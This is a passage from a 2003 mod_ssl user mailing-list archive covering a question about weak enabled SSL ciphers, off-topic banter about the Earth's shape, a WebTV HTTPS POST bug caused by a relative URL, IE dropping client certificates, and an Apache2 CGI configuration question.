> Enc=RC4(128)  Mac=SHA1
> RC4-MD5                 SSLv3 Kx=RSA      Au=RSA  
> Enc=RC4(128)  Mac=MD5
> IDEA-CBC-MD5            SSLv2 Kx=RSA      Au=RSA  
> Enc=IDEA(128) Mac=MD5
> RC2-CBC-MD5             SSLv2 Kx=RSA      Au=RSA  
> Enc=RC2(128)  Mac=MD5
> RC4-MD5                 SSLv2 Kx=RSA      Au=RSA  
> Enc=RC4(128)  Mac=MD5
> 
> But apparently I am also supporting:
> ADH-DES-CBC-SHA
> DES-CBC-SHA
> EDH-DSS-DES-CBC-SHA
> EDH-RSA-DES-CBC-SHA
> EXP1024-DES-CBC-SHA
> EXP1024-DHE-DSS-DES-CBC-SHA
> EXP1024-DHE-DSS-RC4-SHA
> EXP1024-RC2-CBC-MD5
> EXP1024-RC4-MD5
> EXP1024-RC4-SHA
> EXP-ADH-DES-CBC-SHA
> EXP-ADH-RC4-MD5
> EXP-DES-CBC-SHA
> EXP-EDH-DSS-DES-CBC-SHA
> EXP-EDH-RSA-DES-CBC-SHA
> EXP-RC2-CBC-MD5
> EXP-RC4-MD5
> NULL-MD5
> NULL-SHA
> 
> Is the security auditor full of it?  How can I verify their results
> from an external machine (they've scanned the network from an
> external box)?
> 
> Thanks,
> -- 
> Steve Chadsey 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 11:08:56 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 20ECD2AA0A5; Fri, 24 Jan 2003 11:08:56 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id B7F292AA09F
	for ; Fri, 24 Jan 2003 11:08:50 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h0OA8kCl028967
	for ; Fri, 24 Jan 2003 11:08:46 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0OA8jqs023719
	for ; Fri, 24 Jan 2003 11:08:45 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Verifying enabled ciphers?
Date: Fri, 24 Jan 2003 11:08:45 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Verifying enabled ciphers?
Importance: normal
thread-index: AcLDi5S2eRPlIx9KQYO2tyxi//jMAwAAsfGA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
>
>Nearly everything we believe is second hand. For example, less than 500
>people have seen the Earth from space, yet the majority of 
>people believe it is round (or an oblate sphere for the pedants).
>

Perhaps. But this is not why we believe it to be round. We know it is a
sphere from observations we make on the surface. For instance, ships
sailing away from port disappear from the bottom up (Columbus knew
that). The main evidence comes from the fact that the angle of elevation
of astronomical bodies sighted at the same time in different places
varies in a way that can only be explained if we are on the surface of a
sphere.

In any case, billions of people have seen at first-hand photos of the
Earth from space. Are we to assume all photos are always faked?

Rgds,

Owen Boyle

PS I liked your one about Alexander Graham Bell :-)

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 11:28:07 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C98E12AA0A5; Fri, 24 Jan 2003 11:28:07 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 6E3922AA08F
	for ; Fri, 24 Jan 2003 11:27:57 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0OAVV607564
	for ; Fri, 24 Jan 2003 10:31:58 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 24 Jan 2003 10:26:54 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F25AC@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Verifying enabled ciphers?
Date: Fri, 24 Jan 2003 10:26:53 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> Sent: 24 January 2003 10:09
> To: modssl-users@modssl.org
> Subject: RE: Verifying enabled ciphers?
> 
> 
> >-----Original Message-----
> >From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
> >
> >Nearly everything we believe is second hand. For example, 
> less than 500
> >people have seen the Earth from space, yet the majority of 
> >people believe it is round (or an oblate sphere for the pedants).
> >
> 
> Perhaps. But this is not why we believe it to be round. We 
> know it is a
> sphere from observations we make on the surface. For instance, ships
> sailing away from port disappear from the bottom up (Columbus knew
> that). The main evidence comes from the fact that the angle 
> of elevation
> of astronomical bodies sighted at the same time in different places
> varies in a way that can only be explained if we are on the 
> surface of a
> sphere.
> 
> In any case, billions of people have seen at first-hand photos of the
> Earth from space. Are we to assume all photos are always faked?
> 
> Rgds,
> 
> Owen Boyle
> 
> PS I liked your one about Alexander Graham Bell :-)
> 
I heard the quote about Alexander Graham Bell on Classic FM, and couldn't
resist using it. Ironically, most of the time he turned his telephone off as
it disturbed his work.

Indeed, there is "evidence" that the earth is curved. I've seen it myself 6
miles up in an aircraft. However, there are still only 430 people (that
figure comes from NASA staffer Catherine Watson), and not many women among
them, who've seen the earth as round for themselves.

A cynic may well claim that pictures of the Earth from space are faked.
After all, that claim has been levelled against the Bible for years (and
every year, more and more evidence is uncovered to support its authenticity.
eg http://news.bbc.co.uk/1/hi/world/middle_east/2655781.stm, although their
statement about it being the "first" piece of physical evidence needs taking
with a large pinch of salt)

Incidentally, I was bought Origin of Species for Christmas, and I'm reading
through it properly. I hadn't read that much of it, and what I had read was
from quotes by other people. Which is probably where most "believers" in
Evolution are at, simply following the flock.

His section on problems with the theory is interesting, as those problems
are still true, and there are many more problems too.

John


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 11:34:54 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 945222AA0A5; Fri, 24 Jan 2003 11:34:54 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 2ADCB2AA08F
	for ; Fri, 24 Jan 2003 11:34:53 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0OAd6608119
	for ; Fri, 24 Jan 2003 10:39:11 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 24 Jan 2003 10:34:29 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F25AD@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Verifying enabled ciphers?
Date: Fri, 24 Jan 2003 10:34:29 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apologies for the last message everyone. I thought I was sending it
personally, and not to the list. 

Must pay more attention in the mornings.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Nearly everything we believe is second hand. For example, less than 500
people have seen the Earth from space, yet the majority of people believe it
is round (OK pedants, an oblate sphere).

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 14:14:17 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CC2442AA0A5; Fri, 24 Jan 2003 14:14:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp08.wxs.nl (smtp08.wxs.nl [195.121.6.40])
	by master.modssl.org (Postfix) with ESMTP id 4B7982AA08F
	for ; Fri, 24 Jan 2003 14:14:16 +0100 (CET)
Received: from apps18.wxs.nl ([195.121.7.151]) by smtp08.wxs.nl
          (Netscape Messaging Server 4.15) with ESMTP id H97ZFF01.QED for
          ; Fri, 24 Jan 2003 14:14:03 +0100 
Message-ID: <3949344.1043414050861.JavaMail.root@apps18.wxs.nl>
Date: Fri, 24 Jan 2003 14:14:10 +0100 (CET)
From: cybersushi@planet.nl
To: modssl-users@modssl.org
Subject: 
Mime-Version: 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_1412_3832431.1043414050859"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cybersushi@planet.nl
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1412_3832431.1043414050859
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


------=_Part_1412_3832431.1043414050859--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 14:17:01 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 11F692AA0A5; Fri, 24 Jan 2003 14:17:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from klawon.org (149.147.8.67.cfl.rr.com [67.8.147.149])
	by master.modssl.org (Postfix) with ESMTP id 2CD412AA08F
	for ; Fri, 24 Jan 2003 14:16:57 +0100 (CET)
Received: from ktklaptop ([192.168.1.129])
	by klawon.org (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id h0ODV4I29286
	for ; Fri, 24 Jan 2003 08:31:05 -0500
Message-ID: <016401c2c3ab$1d258fa0$8101a8c0@ktklaptop>
From: "Kevin" 
To: 
References: <1043350593.15763.17.camel@morticia>
Subject: Re: problems with WebTV
Date: Fri, 24 Jan 2003 08:18:40 -0500
Organization: Klawon Family
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.3000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kevin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

WebTV  has been behind all other browsers for years.  Their JavaScript VM
was so bad, that we actually checked for WebTV within the client and use a
JavaScript POPUP that stated that our site would not work.  My guess is,
this is just another area that did not get implemented.  I might add some
client code to check for WebTV and change all URL targets dynamically to
just use HTTP.  Let me know if you need help in that area.

Peace,
KevinK

----- Original Message -----
From: "Christopher McCrory" 
To: 
Sent: Thursday, January 23, 2003 2:36 PM
Subject: problems with WebTV


> Hello...
>
> We are having SSL problems with WebTV clients.  Static pages seem to
> work, but POSTs seem to break with the following SSL error:
>
> [Thu Jan 23 11:18:01 2003] [error] mod_ssl: SSL handshake failed: HTTP
> spoken on HTTPS port; trying to send HTML error page (OpenSSL library
> error follows)
>
> [Thu Jan 23 11:18:01 2003] [error] OpenSSL:
> error:1407609C:lib(20):func(118):reason(156)
>
> What voodoo do I need to adjust for this 0.01% of the market browser? ;)
>
> Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_gzip/1.3.26.1a
> PHP/4.3.0 mod_ssl/2.8.12 OpenSSL/0.9.6b
>
>
> --
> Christopher McCrory
>  "The guy that keeps the servers running"
>
> chrismcc@pricegrabber.com
>  http://www.pricegrabber.com
>
> Let's face it, there's no Hollow Earth, no robots, and
> no 'mute rays.' And even if there were, waxed paper is
> no defense.  I tried it.  Only tinfoil works.
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 14:31:35 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E769D2AA0C2; Fri, 24 Jan 2003 14:31:34 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp02.wxs.nl (smtp02.wxs.nl [195.121.6.54])
	by master.modssl.org (Postfix) with ESMTP id 8799E2AA09F
	for ; Fri, 24 Jan 2003 14:31:33 +0100 (CET)
Received: from apps18.wxs.nl ([195.121.7.151]) by smtp02.wxs.nl
          (Netscape Messaging Server 4.15) with ESMTP id H9808Y01.A4H for
          ; Fri, 24 Jan 2003 14:31:46 +0100 
Message-ID: <6454713.1043415087297.JavaMail.root@apps18.wxs.nl>
Date: Fri, 24 Jan 2003 14:31:27 +0100 (CET)
From: cybersushi@planet.nl
To: modssl-users@modssl.org
Subject: IE stops sending client certificate
Mime-Version: 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_1594_5240082.1043415087295"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cybersushi@planet.nl
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1594_5240082.1043415087295
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Hi,

We've been having problems with apache/modssl and client certificates in IE (5.5sp2, 6, 6sp1 all versions of Windows).

When the client sets up a session ofr the first time he gets prompted for his client cert and after entering the cert password he is able to access the secure site (like he should). But after 15 mins or so he tries to access the page again and than he cannot access the page. In our logs we see that we're not recieving teh client cert. Apparently the bowser stops sending the client cert.

Does anyone know how to resolve this?

We've set ClientCacheTime and ServerCacheTime for the browser at  24hrs and SSLClientTimeout/SSLServerTimeout  also to 24hrs


------=_Part_1594_5240082.1043415087295--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 15:15:32 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 756472AA0C2; Fri, 24 Jan 2003 15:15:31 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id BD9AC2AA08F
	for ; Fri, 24 Jan 2003 15:15:23 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA06574;
	Fri, 24 Jan 2003 09:09:56 -0500
Date: Fri, 24 Jan 2003 09:09:56 -0500 (EST)
From: "R. DuFresne" 
To: John.Airey@rnib.org.uk
Cc: modssl-users@modssl.org
Subject: RE: Verifying enabled ciphers?
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F25AC@pborolocal.rnib.org.uk>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 24 Jan 2003 John.Airey@rnib.org.uk wrote:

	[SNIP]

> A cynic may well claim that pictures of the Earth from space are faked.
> After all, that claim has been levelled against the Bible for years (and
> every year, more and more evidence is uncovered to support its authenticity.
> eg http://news.bbc.co.uk/1/hi/world/middle_east/2655781.stm, although their
> statement about it being the "first" piece of physical evidence needs taking
> with a large pinch of salt)
> 

Are you saying the bible isn't spherical??!! 


Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 15:33:34 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 878072AA0A5; Fri, 24 Jan 2003 15:33:34 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mtiwmhc11.worldnet.att.net (mtiwmhc11.worldnet.att.net [204.127.131.115])
	by master.modssl.org (Postfix) with ESMTP id 5D6742AA0C2
	for ; Fri, 24 Jan 2003 15:33:28 +0100 (CET)
Received: from mtiwebc19 ([204.127.135.58]) by mtiwmhc11.worldnet.att.net
          (InterMail vM.5.01.05.12 201-253-122-126-112-20020820) with SMTP
          id <20030124143318.ITCV9286.mtiwmhc11.worldnet.att.net@mtiwebc19>
          for ; Fri, 24 Jan 2003 14:33:18 +0000
Received: from [24.189.40.187] by mtiwebc19;
	Fri, 24 Jan 2003 14:33:18 +0000
From: john.f.kline@att.net
To: modssl-users@modssl.org
Subject: RE: Verifying enabled ciphers?
Date: Fri, 24 Jan 2003 14:33:18 +0000
X-Mailer: AT&T Message Center Version 1 (Nov 25 2002)
X-Authenticated-Sender: am9obi5mLmtsaW5lQGF0dC5uZXQ=
Message-Id: <20030124143318.ITCV9286.mtiwmhc11.worldnet.att.net@mtiwebc19>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: john.f.kline@att.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

What round?  Wow!  That's news too me.  Now I can resume my travels as I had 
paused for conscerns of walking off the edge....
> >-----Original Message-----
> >From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
> >
> >Nearly everything we believe is second hand. For example, less than 500
> >people have seen the Earth from space, yet the majority of 
> >people believe it is round (or an oblate sphere for the pedants).
> >
> 
> Perhaps. But this is not why we believe it to be round. We know it is a
> sphere from observations we make on the surface. For instance, ships
> sailing away from port disappear from the bottom up (Columbus knew
> that). The main evidence comes from the fact that the angle of elevation
> of astronomical bodies sighted at the same time in different places
> varies in a way that can only be explained if we are on the surface of a
> sphere.
> 
> In any case, billions of people have seen at first-hand photos of the
> Earth from space. Are we to assume all photos are always faked?
> 
> Rgds,
> 
> Owen Boyle
> 
> PS I liked your one about Alexander Graham Bell :-)
> 
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company. 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 19:16:22 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8CC4F2AA0CB; Fri, 24 Jan 2003 19:16:22 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mercury.pricegrabber.com (mercury.pricegrabber.com [65.241.50.130])
	by master.modssl.org (Postfix) with ESMTP id AC17A2AA0C9
	for ; Fri, 24 Jan 2003 19:16:16 +0100 (CET)
Received: from office15.internal.pricegrabber.com (office15.internal.pricegrabber.com [192.168.10.15])
	(authenticated bits=0)
	by mercury.pricegrabber.com (8.12.6/8.12.6) with ESMTP id h0OIGALi023063;
	Fri, 24 Jan 2003 10:16:12 -0800
Subject: Re: problems with WebTV
From: Christopher McCrory 
To: modssl-users@modssl.org
In-Reply-To: <016401c2c3ab$1d258fa0$8101a8c0@ktklaptop>
References: <1043350593.15763.17.camel@morticia>
	 <016401c2c3ab$1d258fa0$8101a8c0@ktklaptop>
Content-Type: text/plain
Organization: 
Message-Id: <1043432164.8815.4.camel@office15.internal.pricegrabber.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.1 (1.2.1-4) 
Date: 24 Jan 2003 10:16:08 -0800
Content-Transfer-Encoding: 7bit
X-RAVMilter-Version: 8.3.3(snapshot 20020312) (mercury.pricegrabber.com)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher McCrory 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello...


On Fri, 2003-01-24 at 05:18, Kevin wrote:
> WebTV  has been behind all other browsers for years.  Their JavaScript VM
> was so bad, that we actually checked for WebTV within the client and use a
> JavaScript POPUP that stated that our site would not work.  My guess is,
> this is just another area that did not get implemented.  I might add some
> client code to check for WebTV and change all URL targets dynamically to
> just use HTTP.  Let me know if you need help in that area.
> 

I found the problem.  One of the POST URLs was relative.  WebTV
interpeted this "/somepage.php" as
"http://www.pricegrabber.com:443/somepage.php"

:(

After I posted, I reread the error. "...HTTP spoken on HTTPS..." That
pointed me in the right direction.

"log files are your friend"  




> Peace,
> KevinK
> 
> ----- Original Message -----
> From: "Christopher McCrory" 
> To: 
> Sent: Thursday, January 23, 2003 2:36 PM
> Subject: problems with WebTV
> 
> 
> > Hello...
> >
> > We are having SSL problems with WebTV clients.  Static pages seem to
> > work, but POSTs seem to break with the following SSL error:
> >
> > [Thu Jan 23 11:18:01 2003] [error] mod_ssl: SSL handshake failed: HTTP
> > spoken on HTTPS port; trying to send HTML error page (OpenSSL library
> > error follows)
> >
> > [Thu Jan 23 11:18:01 2003] [error] OpenSSL:
> > error:1407609C:lib(20):func(118):reason(156)
> >
> > What voodoo do I need to adjust for this 0.01% of the market browser? ;)
> >
> > Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_gzip/1.3.26.1a
> > PHP/4.3.0 mod_ssl/2.8.12 OpenSSL/0.9.6b
> >
> >
> > --
> > Christopher McCrory
> >  "The guy that keeps the servers running"
> >
> > chrismcc@pricegrabber.com
> >  http://www.pricegrabber.com
> >
> > Let's face it, there's no Hollow Earth, no robots, and
> > no 'mute rays.' And even if there were, waxed paper is
> > no defense.  I tried it.  Only tinfoil works.
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-- 
Christopher McCrory
 "The guy that keeps the servers running"
 
chrismcc@pricegrabber.com
 http://www.pricegrabber.com
 
Let's face it, there's no Hollow Earth, no robots, and
no 'mute rays.' And even if there were, waxed paper is
no defense.  I tried it.  Only tinfoil works.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 24 19:30:32 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88D6E2AA0CB; Fri, 24 Jan 2003 19:30:32 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from uxmcc2.iimas.unam.mx (uxmcc2.iimas.unam.mx [132.248.51.209])
	by master.modssl.org (Postfix) with ESMTP id 547882AA0A5
	for ; Fri, 24 Jan 2003 19:30:30 +0100 (CET)
Received: from localhost (ormanuel@localhost)
	by uxmcc2.iimas.unam.mx (8.10.2+Sun/8.10.2) with SMTP id h0OIaxn11776
	for ; Fri, 24 Jan 2003 12:36:59 -0600 (CST)
Date: Fri, 24 Jan 2003 12:36:59 -0600 (CST)
From: Ortiz Ruiz Otoniel Manuel 
X-Sender: ormanuel@uxmcc2
To: modssl-users@modssl.org
Subject: ScriptAlias 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ortiz Ruiz Otoniel Manuel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I have a problem trying to execute cgis under ssl. (It doesn't find the
URL, a kind of problem with the scriptalias). 

I compiled apache2 with ssl, this are the options that I used.
At the bottom there is a fragment of my ssl.conf.

Any help will be appreciated


OPTIONS:
#  CC=gcc ./configure --prefix=/web/apache2 --enable-dav --enable-info \
> --enable-http --enable-proxy-ftp --enable-proxy-connect
--enable-proxy-http \
